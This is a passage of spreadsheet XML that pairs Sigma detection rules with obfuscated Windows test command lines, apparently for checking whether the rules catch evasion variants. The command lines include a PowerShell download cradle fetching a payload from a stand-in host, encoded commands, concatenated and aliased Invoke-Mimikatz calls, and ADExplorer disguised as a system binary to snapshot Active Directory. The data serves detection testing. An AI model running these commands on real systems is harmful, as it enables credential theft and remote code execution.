          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C367" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D367" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E367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367" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G367" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H367" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I367" s="43" t="n"/>
      <c r="J367" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K367" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="368" ht="15.75" customHeight="1" s="42">
      <c r="A368" s="43" t="n"/>
      <c r="B368" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C368" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D368" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E368" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nOprOfIle /"NonInteractive" -ep Bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://maliciousurl.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F368" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G368" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H368" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I368" s="43" t="n"/>
      <c r="J368" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K368" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="369" ht="15.75" customHeight="1" s="42">
      <c r="A369" s="43" t="n"/>
      <c r="B369" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C369" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D369" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E369" s="36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369" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G369" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H369" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I369" s="36" t="n"/>
      <c r="J369" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K369" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="370" ht="15.75" customHeight="1" s="42">
      <c r="A370" s="43" t="n"/>
      <c r="B370" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C370" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D370" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E370" s="36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370" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G370" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H370" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I370" s="43" t="n"/>
      <c r="J370" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K370" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="371" ht="15.75" customHeight="1" s="42">
      <c r="A371" s="43" t="n"/>
      <c r="B371" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C371" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D371" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E371" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F371" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G371" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H371" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I371" s="36" t="n"/>
      <c r="J371" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K371" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="372" ht="15.75" customHeight="1" s="42">
      <c r="A372" s="43" t="n"/>
      <c r="B372" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C372" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D372" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E372" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -enc JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F372" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G372" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H372" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I372" s="36" t="n"/>
      <c r="J372" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K372" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="373" ht="15.75" customHeight="1" s="42">
      <c r="A373" s="43" t="n"/>
      <c r="B373" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C373" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D373" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E373" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ENcodEDCOMManD JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F373" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G373" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H373" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I373" s="36" t="n"/>
      <c r="J373" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K373" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="374" ht="15.75" customHeight="1" s="42">
      <c r="A374" s="43" t="n"/>
      <c r="B374" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C374" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D374" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E374" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F374" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G374" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H374" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I374" s="43" t="n"/>
      <c r="J374" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K374" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="375" ht="15.75" customHeight="1" s="42">
      <c r="A375" s="43" t="n"/>
      <c r="B375" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C375" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D375" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E375" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F375" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G375" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H375" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I375" s="36" t="n"/>
      <c r="J375" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K375" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="376" ht="15.75" customHeight="1" s="42">
      <c r="A376" s="43" t="n"/>
      <c r="B376" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C376" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D376" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E376" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F376" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G376" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H376" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I376" s="43" t="n"/>
      <c r="J376" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K376" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="377" ht="15.75" customHeight="1" s="42">
      <c r="A377" s="43" t="n"/>
      <c r="B377" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C377" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D377" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E377" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F377" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G377" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H377" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I377" s="36" t="n"/>
      <c r="J377" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K377" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="378" ht="15.75" customHeight="1" s="42">
      <c r="A378" s="43" t="n"/>
      <c r="B378" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C378" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D378" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E378" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F378" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G378" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H378" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I378" s="43" t="n"/>
      <c r="J378" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K378" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="379" ht="15.75" customHeight="1" s="42">
      <c r="A379" s="43" t="n"/>
      <c r="B379" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C379" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D379" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E379" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F379" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G379" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H379" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I379" s="36" t="n"/>
      <c r="J379" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K379" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="380" ht="15.75" customHeight="1" s="42">
      <c r="A380" s="43" t="n"/>
      <c r="B380" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C380" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D380" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E380" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F380" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G380" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H380" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I380" s="43" t="n"/>
      <c r="J380" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K380" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="381" ht="15.75" customHeight="1" s="42">
      <c r="A381" s="43" t="n"/>
      <c r="B381" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C381" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D381" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E381" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -enc SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F381" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G381" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H381" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I381" s="36" t="n"/>
      <c r="J381" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K381" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="382" ht="15.75" customHeight="1" s="42">
      <c r="A382" s="43" t="n"/>
      <c r="B382" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C382" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D382" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E382" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F382" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G382" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H382" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I382" s="43" t="n"/>
      <c r="J382" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K382" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="383" ht="15.75" customHeight="1" s="42">
      <c r="A383" s="43" t="n"/>
      <c r="B383" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C383" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D383" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E383" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -EncodeDcommANd SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F383" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G383" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H383" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I383" s="36" t="n"/>
      <c r="J383" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K383" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="384" ht="15.75" customHeight="1" s="42">
      <c r="A384" s="43" t="n"/>
      <c r="B384" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C384" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D384" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E384" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -eNcoDedcoMmAND SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F384" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G384" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H384" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I384" s="43" t="n"/>
      <c r="J384" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K384" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="385" ht="15.75" customHeight="1" s="42">
      <c r="A385" s="43" t="n"/>
      <c r="B385" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C385" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D385" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E385" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F385" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G385" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H385" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I385" s="43" t="n"/>
      <c r="J385" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K385" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="386" ht="15.75" customHeight="1" s="42">
      <c r="A386" s="43" t="n"/>
      <c r="B386" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C386" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D386" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E386" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F386" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G386" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H386" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I386" s="36" t="n"/>
      <c r="J386" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K386" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="387" ht="15.75" customHeight="1" s="42">
      <c r="A387" s="43" t="n"/>
      <c r="B387" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C387" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D387" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E387" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F387" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G387" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H387" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I387" s="43" t="n"/>
      <c r="J387" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K387" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="388" ht="15.75" customHeight="1" s="42">
      <c r="A388" s="43" t="n"/>
      <c r="B388" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C388" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D388" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E388" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F388" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G388" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H388" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I388" s="43" t="n"/>
      <c r="J388" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K388" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="389" ht="15.75" customHeight="1" s="42">
      <c r="A389" s="36" t="n"/>
      <c r="B389" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C389" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D389" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E389" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F389" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G389" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H389" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I389" s="43" t="n"/>
      <c r="J389" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K389" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="390" ht="15.75" customHeight="1" s="42">
      <c r="A390" s="36" t="n"/>
      <c r="B390" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C390" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D390" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E390" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F390" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G390" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H390" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I390" s="43" t="n"/>
      <c r="J390" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K390" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="391" ht="15.75" customHeight="1" s="42">
      <c r="A391" s="36" t="inlineStr">
        <is>
          <t>t1087.002</t>
        </is>
      </c>
      <c r="B391" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_adfind_enumeration</t>
        </is>
      </c>
      <c r="C391" s="36" t="inlineStr">
        <is>
          <t>PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE</t>
        </is>
      </c>
      <c r="D391" s="36" t="inlineStr">
        <is>
          <t>455b9d50-15a1-4b99-853f-8d37655a4c1b</t>
        </is>
      </c>
      <c r="E391" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "AdFind.exe -s^c exchaddresses"</t>
        </is>
      </c>
      <c r="F391" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G391" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H391" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I391" s="36" t="n"/>
      <c r="J391" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K391" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="392" ht="15.75" customHeight="1" s="42">
      <c r="A392" s="36" t="n"/>
      <c r="B392" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_adexplorer_susp_execution</t>
        </is>
      </c>
      <c r="C392" s="36" t="inlineStr">
        <is>
          <t>Suspicious Active Directory Database Snapshot Via ADExplorer</t>
        </is>
      </c>
      <c r="D392" s="36" t="inlineStr">
        <is>
          <t>ef61af62-bc74-4f58-b49b-626448227652</t>
        </is>
      </c>
      <c r="E392" s="36" t="inlineStr">
        <is>
          <t>cmd /c "copy C:\Tools\ADExplorer64.exe C:\Windows\System32\sysinfo.exe &amp;&amp; C:\Windows\System32\sysinfo.exe -snapshot C:\PerfLogs\ad.db"</t>
        </is>
      </c>
      <c r="F392" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G392" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H392" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I392" s="43" t="n"/>
      <c r="J392" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K392" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="393" ht="15.75" customHeight="1" s="42">
      <c r="A393" s="36" t="n"/>
      <c r="B393" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_adexplorer_susp_execution</t>
        </is>
      </c>
      <c r="C393" s="36" t="inlineStr">
        <is>
          <t>Suspicious Active Directory Database Snapshot Via ADExplorer</t>
        </is>
      </c>
      <c r="D393" s="36" t="inlineStr">
        <is>
          <t>ef61af62-bc74-4f58-b49b-626448227652</t>
        </is>
      </c>
      <c r="E393" s="36" t="inlineStr">
        <is>
          <t>cmd /C "copy C:\Tools\ADExplorer64.exe C:\Windows\System32\sysinfo.exe &amp;&amp; C:\Windows\System32\sysinfo.exe -snapshot C:\PerfLogs\ad.db"</t>
        </is>
      </c>
      <c r="F393" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G393" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H393" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I393" s="43" t="n"/>
      <c r="J393" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K393" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="394" ht="15.75" customHeight="1" s="42">
      <c r="A394" s="36" t="n"/>
      <c r="B394" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_psloglist</t>
        </is>
      </c>
      <c r="C394" s="36" t="inlineStr">
        <is>
          <t>Suspicious Use of PsLogList</t>
        </is>
      </c>
      <c r="D394" s="36" t="inlineStr">
        <is>
          <t>aae1243f-d8af-40d8-ab20-33fc6d0c55bc</t>
        </is>
      </c>
      <c r="E394" s="43" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\cmd.exe" /C "powershell -"NoProfile" -WIndowStYLe Hidden -"Command" \" &amp;{Start-Process /"FilePath" 'C:\Windows\Sysinternals\psloglist64.exe' -ArGUmENTlIst "-x'" , 'application' }\""</t>
        </is>
      </c>
      <c r="F394" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G394" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H394" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I394" s="43" t="n"/>
      <c r="J394" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K394" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="395" ht="15.75" customHeight="1" s="42">
      <c r="A395" s="43" t="n"/>
      <c r="B395" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_psloglist</t>
        </is>
      </c>
      <c r="C395" s="36" t="inlineStr">
        <is>
          <t>Suspicious Use of PsLogList</t>
        </is>
      </c>
      <c r="D395" s="36" t="inlineStr">
        <is>
          <t>aae1243f-d8af-40d8-ab20-33fc6d0c55bc</t>
        </is>
      </c>
      <c r="E395" s="43" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\cmd.exe" /c "powershell -noProfILe -wIndoWsTYle Hidden -CommanD \" &amp;{Start-Process -FilePath 'C:\Windows\Sysinternals\psloglist64.exe' -ArgUMEntlist '-x' , 'application' }\""</t>
        </is>
      </c>
      <c r="F395" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G395" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H395" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I395" s="43" t="n"/>
      <c r="J395" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K395" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="396" ht="15.75" customHeight="1" s="42">
      <c r="A396" s="36" t="n"/>
      <c r="B396" s="36" t="inlineStr">
